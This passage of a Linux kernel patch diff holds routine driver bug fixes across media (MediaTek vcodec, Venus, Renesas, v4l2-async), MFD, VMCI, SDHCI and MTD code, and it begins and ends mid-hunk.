+@@ -597,7 +597,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&inst->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(inst, "failed to get lat buffer");
+-		return -EINVAL;
++		return -EAGAIN;
+ 	}
+ 	share_info = lat_buf->private_data;
+ 	src_buf_info = container_of(bs, struct mtk_video_dec_buf, bs_buffer);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index cbb6728b8a40b..cf16cf2807f07 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2070,7 +2070,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&instance->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(instance, "Failed to get VP9 lat buf\n");
+-		return -EBUSY;
++		return -EAGAIN;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+ 	if (!pfc) {
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index dc2004790a472..f3073d1e7f420 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -52,9 +52,26 @@ static struct list_head *vdec_get_buf_list(int hardware_index, struct vdec_lat_b
+ 	}
+ }
+ 
++static void vdec_msg_queue_inc(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_inc(&msg_queue->core_list_cnt);
++	else
++		atomic_inc(&msg_queue->lat_list_cnt);
++}
++
++static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_dec(&msg_queue->core_list_cnt);
++	else
++		atomic_dec(&msg_queue->lat_list_cnt);
++}
++
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
++	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -66,11 +83,18 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	list_add_tail(head, &msg_ctx->ready_queue);
+ 	msg_ctx->ready_num++;
+ 
+-	if (msg_ctx->hardware_index != MTK_VDEC_CORE)
++	vdec_msg_queue_inc(&buf->ctx->msg_queue, msg_ctx->hardware_index);
++	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+-	else
+-		queue_work(buf->ctx->dev->core_workqueue,
+-			   &buf->ctx->msg_queue.core_work);
++	} else {
++		if (buf->ctx->msg_queue.core_work_cnt <
++			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
++			status = queue_work(buf->ctx->dev->core_workqueue,
++					    &buf->ctx->msg_queue.core_work);
++			if (status)
++				buf->ctx->msg_queue.core_work_cnt++;
++		}
++	}
+ 
+ 	mtk_v4l2_debug(3, "enqueue buf type: %d addr: 0x%p num: %d",
+ 		       msg_ctx->hardware_index, buf, msg_ctx->ready_num);
+@@ -127,6 +151,7 @@ struct vdec_lat_buf *vdec_msg_queue_dqbuf(struct vdec_msg_queue_ctx *msg_ctx)
+ 		return NULL;
+ 	}
+ 	list_del(head);
++	vdec_msg_queue_dec(&buf->ctx->msg_queue, msg_ctx->hardware_index);
+ 
+ 	msg_ctx->ready_num--;
+ 	mtk_v4l2_debug(3, "dqueue buf type:%d addr: 0x%p num: %d",
+@@ -156,11 +181,29 @@ void vdec_msg_queue_update_ube_wptr(struct vdec_msg_queue *msg_queue, uint64_t u
+ 
+ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ {
++	struct vdec_lat_buf *buf, *tmp;
++	struct list_head *list_core[3];
++	struct vdec_msg_queue_ctx *core_ctx;
++	int ret, i, in_core_count = 0, count = 0;
+ 	long timeout_jiff;
+-	int ret;
++
++	core_ctx = &msg_queue->ctx->dev->msg_queue_core_ctx;
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			list_core[in_core_count++] = &buf->core_list;
++			list_del(&buf->core_list);
++		}
++	}
++
++	for (i = 0; i < in_core_count; i++) {
++		list_add(list_core[in_core_count - (1 + i)], &core_ctx->ready_queue);
++		queue_work(msg_queue->ctx->dev->core_workqueue, &msg_queue->core_work);
++	}
++	spin_unlock(&core_ctx->ready_lock);
+ 
+ 	timeout_jiff = msecs_to_jiffies(1000 * (NUM_BUFFER_COUNT + 2));
+-	ret = wait_event_timeout(msg_queue->lat_ctx.ready_to_use,
++	ret = wait_event_timeout(msg_queue->ctx->msg_queue.core_dec_done,
+ 				 msg_queue->lat_ctx.ready_num == NUM_BUFFER_COUNT,
+ 				 timeout_jiff);
+ 	if (ret) {
+@@ -168,8 +211,20 @@ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ 			       msg_queue->lat_ctx.ready_num);
+ 		return true;
+ 	}
+-	mtk_v4l2_err("failed with lat buf isn't full: %d",
+-		     msg_queue->lat_ctx.ready_num);
++
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			count++;
++			list_del(&buf->core_list);
++		}
++	}
++	spin_unlock(&core_ctx->ready_lock);
++
++	mtk_v4l2_err("failed with lat buf isn't full: list(%d %d) count:%d",
++		     atomic_read(&msg_queue->lat_list_cnt),
++		     atomic_read(&msg_queue->core_list_cnt), count);
++
+ 	return false;
+ }
+ 
+@@ -206,6 +261,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
++	int status;
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -221,11 +277,18 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+-		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+-			       dev->msg_queue_core_ctx.ready_num);
+-		queue_work(dev->core_workqueue, &msg_queue->core_work);
++	wake_up_all(&ctx->msg_queue.core_dec_done);
++	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
++	lat_buf->ctx->msg_queue.core_work_cnt--;
++
++	if (lat_buf->ctx->msg_queue.core_work_cnt <
++		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
++		status = queue_work(lat_buf->ctx->dev->core_workqueue,
++				    &lat_buf->ctx->msg_queue.core_work);
++		if (status)
++			lat_buf->ctx->msg_queue.core_work_cnt++;
+ 	}
++	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -239,12 +302,18 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	if (msg_queue->wdma_addr.size)
+ 		return 0;
+ 
++	msg_queue->ctx = ctx;
++	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
++
++	atomic_set(&msg_queue->lat_list_cnt, 0);
++	atomic_set(&msg_queue->core_list_cnt, 0);
++	init_waitqueue_head(&msg_queue->core_dec_done);
++
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+ 					     ctx->picinfo.buf_h);
+-
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index c43d427f5f544..a5d44bc97c16b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -72,6 +72,12 @@ struct vdec_lat_buf {
+  * @wdma_wptr_addr: ube write point
+  * @core_work: core hardware work
+  * @lat_ctx: used to store lat buffer list
++ * @ctx: pointer to mtk_vcodec_ctx
++ *
++ * @lat_list_cnt: used to record each instance's lat list count
++ * @core_list_cnt: used to record each instance's core list count
++ * @core_dec_done: core work queue decode done event
++ * @core_work_cnt: the number of core work items in the work queue
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -82,6 +88,12 @@ struct vdec_msg_queue {
+ 
+ 	struct work_struct core_work;
+ 	struct vdec_msg_queue_ctx lat_ctx;
++	struct mtk_vcodec_ctx *ctx;
++
++	atomic_t lat_list_cnt;
++	atomic_t core_list_cnt;
++	wait_queue_head_t core_dec_done;
++	int core_work_cnt;
+ };
+ 
+ /**
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 4ceaba37e2e57..1a52c2ea2da5b 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -31,15 +31,15 @@
+  */
+ static const struct venus_format vdec_formats[] = {
+ 	{
+-		.pixfmt = V4L2_PIX_FMT_QC08C,
++		.pixfmt = V4L2_PIX_FMT_NV12,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+-		.pixfmt = V4L2_PIX_FMT_QC10C,
++		.pixfmt = V4L2_PIX_FMT_QC08C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+-	},{
+-		.pixfmt = V4L2_PIX_FMT_NV12,
++	}, {
++		.pixfmt = V4L2_PIX_FMT_QC10C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+@@ -526,6 +526,7 @@ static int
+ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ {
+ 	struct venus_inst *inst = to_inst(file);
++	struct vb2_queue *dst_vq;
+ 	struct hfi_frame_data fdata = {0};
+ 	int ret;
+ 
+@@ -556,6 +557,13 @@ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ 			inst->codec_state = VENUS_DEC_STATE_DRAIN;
+ 			inst->drain_active = true;
+ 		}
++	} else if (cmd->cmd == V4L2_DEC_CMD_START &&
++		   inst->codec_state == VENUS_DEC_STATE_STOPPED) {
++		dst_vq = v4l2_m2m_get_vq(inst->fh.m2m_ctx,
++					 V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE);
++		vb2_clear_last_buffer_dequeued(dst_vq);
++
++		inst->codec_state = VENUS_DEC_STATE_DECODING;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/media/platform/renesas/rcar_fdp1.c b/drivers/media/platform/renesas/rcar_fdp1.c
+index 37ecf489d112e..c548cb01957b0 100644
+--- a/drivers/media/platform/renesas/rcar_fdp1.c
++++ b/drivers/media/platform/renesas/rcar_fdp1.c
+@@ -2313,8 +2313,10 @@ static int fdp1_probe(struct platform_device *pdev)
+ 
+ 	/* Determine our clock rate */
+ 	clk = clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	if (IS_ERR(clk)) {
++		ret = PTR_ERR(clk);
++		goto put_dev;
++	}
+ 
+ 	fdp1->clk_rate = clk_get_rate(clk);
+ 	clk_put(clk);
+@@ -2323,7 +2325,7 @@ static int fdp1_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(&pdev->dev, &fdp1->v4l2_dev);
+ 	if (ret) {
+ 		v4l2_err(&fdp1->v4l2_dev, "Failed to register video device\n");
+-		return ret;
++		goto put_dev;
+ 	}
+ 
+ 	/* M2M registration */
+@@ -2393,10 +2395,12 @@ release_m2m:
+ unreg_dev:
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 
++put_dev:
++	rcar_fcp_put(fdp1->fcp);
+ 	return ret;
+ }
+ 
+-static int fdp1_remove(struct platform_device *pdev)
++static void fdp1_remove(struct platform_device *pdev)
+ {
+ 	struct fdp1_dev *fdp1 = platform_get_drvdata(pdev);
+ 
+@@ -2404,8 +2408,7 @@ static int fdp1_remove(struct platform_device *pdev)
+ 	video_unregister_device(&fdp1->vfd);
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 	pm_runtime_disable(&pdev->dev);
+-
+-	return 0;
++	rcar_fcp_put(fdp1->fcp);
+ }
+ 
+ static int __maybe_unused fdp1_pm_runtime_suspend(struct device *dev)
+@@ -2441,7 +2444,7 @@ MODULE_DEVICE_TABLE(of, fdp1_dt_ids);
+ 
+ static struct platform_driver fdp1_pdrv = {
+ 	.probe		= fdp1_probe,
+-	.remove		= fdp1_remove,
++	.remove_new	= fdp1_remove,
+ 	.driver		= {
+ 		.name	= DRIVER_NAME,
+ 		.of_match_table = fdp1_dt_ids,
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_video.c b/drivers/media/platform/renesas/vsp1/vsp1_video.c
+index 9d24647c8f324..0cea5e5acf82b 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_video.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_video.c
+@@ -776,7 +776,7 @@ static void vsp1_video_buffer_queue(struct vb2_buffer *vb)
+ 	video->rwpf->mem = buf->mem;
+ 	pipe->buffers_ready |= 1 << video->pipe_index;
+ 
+-	if (vb2_is_streaming(&video->queue) &&
++	if (vb2_start_streaming_called(&video->queue) &&
+ 	    vsp1_pipeline_ready(pipe))
+ 		vsp1_video_pipeline_run(pipe);
+ 
+diff --git a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+index dd74cc43920d3..080da254b9109 100644
+--- a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
++++ b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+@@ -1309,6 +1309,8 @@ static int bdisp_probe(struct platform_device *pdev)
+ 	init_waitqueue_head(&bdisp->irq_queue);
+ 	INIT_DELAYED_WORK(&bdisp->timeout_work, bdisp_irq_timeout);
+ 	bdisp->work_queue = create_workqueue(BDISP_NAME);
++	if (!bdisp->work_queue)
++		return -ENOMEM;
+ 
+ 	spin_lock_init(&bdisp->slock);
+ 	mutex_init(&bdisp->lock);
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 8dbe780dae4e7..41ef8cdba28c4 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -103,6 +103,8 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 		rcdev->map_name = RC_MAP_EMPTY;
+ 
+ 	gpio_dev->rcdev = rcdev;
++	if (of_property_read_bool(np, "wakeup-source"))
++		device_init_wakeup(dev, true);
+ 
+ 	rc = devm_rc_register_device(dev, rcdev);
+ 	if (rc < 0) {
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 2f1b718a91893..008a2a3e312e0 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -414,7 +414,8 @@ static void v4l2_async_cleanup(struct v4l2_subdev *sd)
+ 
+ /* Unbind all sub-devices in the notifier tree. */
+ static void
+-v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
++v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier,
++				 bool readd)
+ {
+ 	struct v4l2_subdev *sd, *tmp;
+ 
+@@ -423,9 +424,11 @@ v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
+ 			v4l2_async_find_subdev_notifier(sd);
+ 
+ 		if (subdev_notifier)
+-			v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++			v4l2_async_nf_unbind_all_subdevs(subdev_notifier, true);
+ 
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
++		if (readd)
++			list_add_tail(&sd->asd->list, &notifier->waiting);
+ 		v4l2_async_cleanup(sd);
+ 
+ 		list_move(&sd->async_list, &subdev_list);
+@@ -557,7 +560,7 @@ err_unbind:
+ 	/*
+ 	 * On failure, unbind all sub-devices registered through this notifier.
+ 	 */
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ err_unlock:
+ 	mutex_unlock(&list_lock);
+@@ -607,7 +610,7 @@ __v4l2_async_nf_unregister(struct v4l2_async_notifier *notifier)
+ 	if (!notifier || (!notifier->v4l2_dev && !notifier->sd))
+ 		return;
+ 
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ 	notifier->sd = NULL;
+ 	notifier->v4l2_dev = NULL;
+@@ -805,7 +808,7 @@ err_unbind:
+ 	 */
+ 	subdev_notifier = v4l2_async_find_subdev_notifier(sd);
+ 	if (subdev_notifier)
+-		v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++		v4l2_async_nf_unbind_all_subdevs(subdev_notifier, false);
+ 
+ 	if (sd->asd)
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index da05b966d48c6..02cf4f3e91d76 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -277,6 +277,7 @@ static const struct of_device_id arizona_spi_of_match[] = {
+ 	{ .compatible = "cirrus,cs47l24", .data = (void *)CS47L24 },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, arizona_spi_of_match);
+ #endif
+ 
+ static struct spi_driver arizona_spi_driver = {
+diff --git a/drivers/mfd/ocelot-spi.c b/drivers/mfd/ocelot-spi.c
+index 2ecd271de2fb9..85021f94e5874 100644
+--- a/drivers/mfd/ocelot-spi.c
++++ b/drivers/mfd/ocelot-spi.c
+@@ -130,6 +130,7 @@ static const struct regmap_config ocelot_spi_regmap_config = {
+ 
+ 	.write_flag_mask = 0x80,
+ 
++	.use_single_read = true,
+ 	.use_single_write = true,
+ 	.can_multi_write = false,
+ 
+diff --git a/drivers/mfd/tqmx86.c b/drivers/mfd/tqmx86.c
+index 7ae906ff8e353..fac02875fe7d9 100644
+--- a/drivers/mfd/tqmx86.c
++++ b/drivers/mfd/tqmx86.c
+@@ -16,8 +16,8 @@
+ #include <linux/platform_data/i2c-ocores.h>
+ #include <linux/platform_device.h>
+ 
+-#define TQMX86_IOBASE	0x160
+-#define TQMX86_IOSIZE	0x3f
++#define TQMX86_IOBASE	0x180
++#define TQMX86_IOSIZE	0x20
+ #define TQMX86_IOBASE_I2C	0x1a0
+ #define TQMX86_IOSIZE_I2C	0xa
+ #define TQMX86_IOBASE_WATCHDOG	0x18b
+@@ -25,14 +25,14 @@
+ #define TQMX86_IOBASE_GPIO	0x18d
+ #define TQMX86_IOSIZE_GPIO	0x4
+ 
+-#define TQMX86_REG_BOARD_ID	0x20
++#define TQMX86_REG_BOARD_ID	0x00
+ #define TQMX86_REG_BOARD_ID_E38M	1
+ #define TQMX86_REG_BOARD_ID_50UC	2
+ #define TQMX86_REG_BOARD_ID_E38C	3
+ #define TQMX86_REG_BOARD_ID_60EB	4
+-#define TQMX86_REG_BOARD_ID_E39M	5
+-#define TQMX86_REG_BOARD_ID_E39C	6
+-#define TQMX86_REG_BOARD_ID_E39x	7
++#define TQMX86_REG_BOARD_ID_E39MS	5
++#define TQMX86_REG_BOARD_ID_E39C1	6
++#define TQMX86_REG_BOARD_ID_E39C2	7
+ #define TQMX86_REG_BOARD_ID_70EB	8
+ #define TQMX86_REG_BOARD_ID_80UC	9
+ #define TQMX86_REG_BOARD_ID_110EB	11
+@@ -40,18 +40,18 @@
+ #define TQMX86_REG_BOARD_ID_E40S	13
+ #define TQMX86_REG_BOARD_ID_E40C1	14
+ #define TQMX86_REG_BOARD_ID_E40C2	15
+-#define TQMX86_REG_BOARD_REV	0x21
+-#define TQMX86_REG_IO_EXT_INT	0x26
++#define TQMX86_REG_BOARD_REV	0x01
++#define TQMX86_REG_IO_EXT_INT	0x06
+ #define TQMX86_REG_IO_EXT_INT_NONE		0
+ #define TQMX86_REG_IO_EXT_INT_7			1
+ #define TQMX86_REG_IO_EXT_INT_9			2
+ #define TQMX86_REG_IO_EXT_INT_12		3
+ #define TQMX86_REG_IO_EXT_INT_MASK		0x3
+ #define TQMX86_REG_IO_EXT_INT_GPIO_SHIFT	4
++#define TQMX86_REG_SAUC		0x17
+ 
+-#define TQMX86_REG_I2C_DETECT	0x47
++#define TQMX86_REG_I2C_DETECT	0x1a7
+ #define TQMX86_REG_I2C_DETECT_SOFT		0xa5
+-#define TQMX86_REG_I2C_INT_EN	0x49
+ 
+ static uint gpio_irq;
+ module_param(gpio_irq, uint, 0);
+@@ -111,7 +111,7 @@ static const struct mfd_cell tqmx86_devs[] = {
+ 	},
+ };
+ 
+-static const char *tqmx86_board_id_to_name(u8 board_id)
++static const char *tqmx86_board_id_to_name(u8 board_id, u8 sauc)
+ {
+ 	switch (board_id) {
+ 	case TQMX86_REG_BOARD_ID_E38M:
+@@ -122,12 +122,12 @@ static const char *tqmx86_board_id_to_name(u8 board_id)
+ 		return "TQMxE38C";
+ 	case TQMX86_REG_BOARD_ID_60EB:
+ 		return "TQMx60EB";
+-	case TQMX86_REG_BOARD_ID_E39M:
+-		return "TQMxE39M";
+-	case TQMX86_REG_BOARD_ID_E39C:
+-		return "TQMxE39C";
+-	case TQMX86_REG_BOARD_ID_E39x:
+-		return "TQMxE39x";
++	case TQMX86_REG_BOARD_ID_E39MS:
++		return (sauc == 0xff) ? "TQMxE39M" : "TQMxE39S";
++	case TQMX86_REG_BOARD_ID_E39C1:
++		return "TQMxE39C1";
++	case TQMX86_REG_BOARD_ID_E39C2:
++		return "TQMxE39C2";
+ 	case TQMX86_REG_BOARD_ID_70EB:
+ 		return "TQMx70EB";
+ 	case TQMX86_REG_BOARD_ID_80UC:
+@@ -160,9 +160,9 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 	case TQMX86_REG_BOARD_ID_E40C1:
+ 	case TQMX86_REG_BOARD_ID_E40C2:
+ 		return 24000;
+-	case TQMX86_REG_BOARD_ID_E39M:
+-	case TQMX86_REG_BOARD_ID_E39C:
+-	case TQMX86_REG_BOARD_ID_E39x:
++	case TQMX86_REG_BOARD_ID_E39MS:
++	case TQMX86_REG_BOARD_ID_E39C1:
++	case TQMX86_REG_BOARD_ID_E39C2:
+ 		return 25000;
+ 	case TQMX86_REG_BOARD_ID_E38M:
+ 	case TQMX86_REG_BOARD_ID_E38C:
+@@ -176,7 +176,7 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 
+ static int tqmx86_probe(struct platform_device *pdev)
+ {
+-	u8 board_id, rev, i2c_det, io_ext_int_val;
++	u8 board_id, sauc, rev, i2c_det, io_ext_int_val;
+ 	struct device *dev = &pdev->dev;
+ 	u8 gpio_irq_cfg, readback;
+ 	const char *board_name;
+@@ -206,14 +206,20 @@ static int tqmx86_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	board_id = ioread8(io_base + TQMX86_REG_BOARD_ID);
+-	board_name = tqmx86_board_id_to_name(board_id);
++	sauc = ioread8(io_base + TQMX86_REG_SAUC);
++	board_name = tqmx86_board_id_to_name(board_id, sauc);
+ 	rev = ioread8(io_base + TQMX86_REG_BOARD_REV);
+ 
+ 	dev_info(dev,
+ 		 "Found %s - Board ID %d, PCB Revision %d, PLD Revision %d\n",
+ 		 board_name, board_id, rev >> 4, rev & 0xf);
+ 
+-	i2c_det = ioread8(io_base + TQMX86_REG_I2C_DETECT);
++	/*
++	 * The I2C_DETECT register is in the range assigned to the I2C driver
++	 * later, so we don't extend TQMX86_IOSIZE. Use inb() for this one-off
++	 * access instead of ioport_map + unmap.
++	 */
++	i2c_det = inb(TQMX86_REG_I2C_DETECT);
+ 
+ 	if (gpio_irq_cfg) {
+ 		io_ext_int_val =
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index 857b9851402a6..abe79f6fd2a79 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -165,10 +165,16 @@ static int vmci_host_close(struct inode *inode, struct file *filp)
+ static __poll_t vmci_host_poll(struct file *filp, poll_table *wait)
+ {
+ 	struct vmci_host_dev *vmci_host_dev = filp->private_data;
+-	struct vmci_ctx *context = vmci_host_dev->context;
++	struct vmci_ctx *context;
+ 	__poll_t mask = 0;
+ 
+ 	if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) {
++		/*
++		 * Read context only if ct_type == VMCIOBJ_CONTEXT to make
++		 * sure that context is initialized
++		 */
++		context = vmci_host_dev->context;
++
+ 		/* Check for VMCI calls to this VM context. */
+ 		if (wait)
+ 			poll_wait(filp, &context->host_context.wait_queue,
+diff --git a/drivers/mmc/host/sdhci-of-esdhc.c b/drivers/mmc/host/sdhci-of-esdhc.c
+index 4712adac7f7c0..48ca1cf15b199 100644
+--- a/drivers/mmc/host/sdhci-of-esdhc.c
++++ b/drivers/mmc/host/sdhci-of-esdhc.c
+@@ -133,6 +133,7 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 			return ret;
+ 		}
+ 	}
++
+ 	/*
+ 	 * The DAT[3:0] line signal levels and the CMD line signal level are
+ 	 * not compatible with standard SDHC register. The line signal levels
+@@ -144,6 +145,16 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		ret = value & 0x000fffff;
+ 		ret |= (value >> 4) & SDHCI_DATA_LVL_MASK;
+ 		ret |= (value << 1) & SDHCI_CMD_LVL;
++
++		/*
++		 * Some controllers have unreliable Data Line Active
++		 * bit for commands with busy signal. This affects
++		 * Command Inhibit (data) bit. Just ignore it since
++		 * MMC core driver has already polled card status
++		 * with CMD13 after any command with busy signal.
++		 */
++		if (esdhc->quirk_ignore_data_inhibit)
++			ret &= ~SDHCI_DATA_INHIBIT;
+ 		return ret;
+ 	}
+ 
+@@ -158,19 +169,6 @@ static u32 esdhc_readl_fixup(struct sdhci_host *host,
+ 		return ret;
+ 	}
+ 
+-	/*
+-	 * Some controllers have unreliable Data Line Active
+-	 * bit for commands with busy signal. This affects
+-	 * Command Inhibit (data) bit. Just ignore it since
+-	 * MMC core driver has already polled card status
+-	 * with CMD13 after any command with busy siganl.
+-	 */
+-	if ((spec_reg == SDHCI_PRESENT_STATE) &&
+-	(esdhc->quirk_ignore_data_inhibit == true)) {
+-		ret = value & ~SDHCI_DATA_INHIBIT;
+-		return ret;
+-	}
+-
+ 	ret = value;
+ 	return ret;
+ }
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 0feacb9fbdac5..0bc9676fe0299 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -888,8 +888,8 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 
+ 	/* OTP nvmem will be registered on the physical device */
+ 	config.dev = mtd->dev.parent;
+-	config.name = kasprintf(GFP_KERNEL, "%s-%s", dev_name(&mtd->dev), compatible);
+-	config.id = NVMEM_DEVID_NONE;
++	config.name = compatible;
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.owner = THIS_MODULE;
+ 	config.type = NVMEM_TYPE_OTP;
+ 	config.root_only = true;
+@@ -905,7 +905,6 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 		nvmem = NULL;
+ 
+ 	of_node_put(np);
+-	kfree(config.name);
+ 
+ 	return nvmem;
+ }
+@@ -940,6 +939,7 @@ static int mtd_nvmem_fact_otp_reg_read(void *priv, unsigned int offset,
+ 
+ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ {
++	struct device *dev = mtd->dev.parent;
+ 	struct nvmem_device *nvmem;
+ 	ssize_t size;
+ 	int err;
+@@ -953,7 +953,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+ 						       mtd_nvmem_user_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
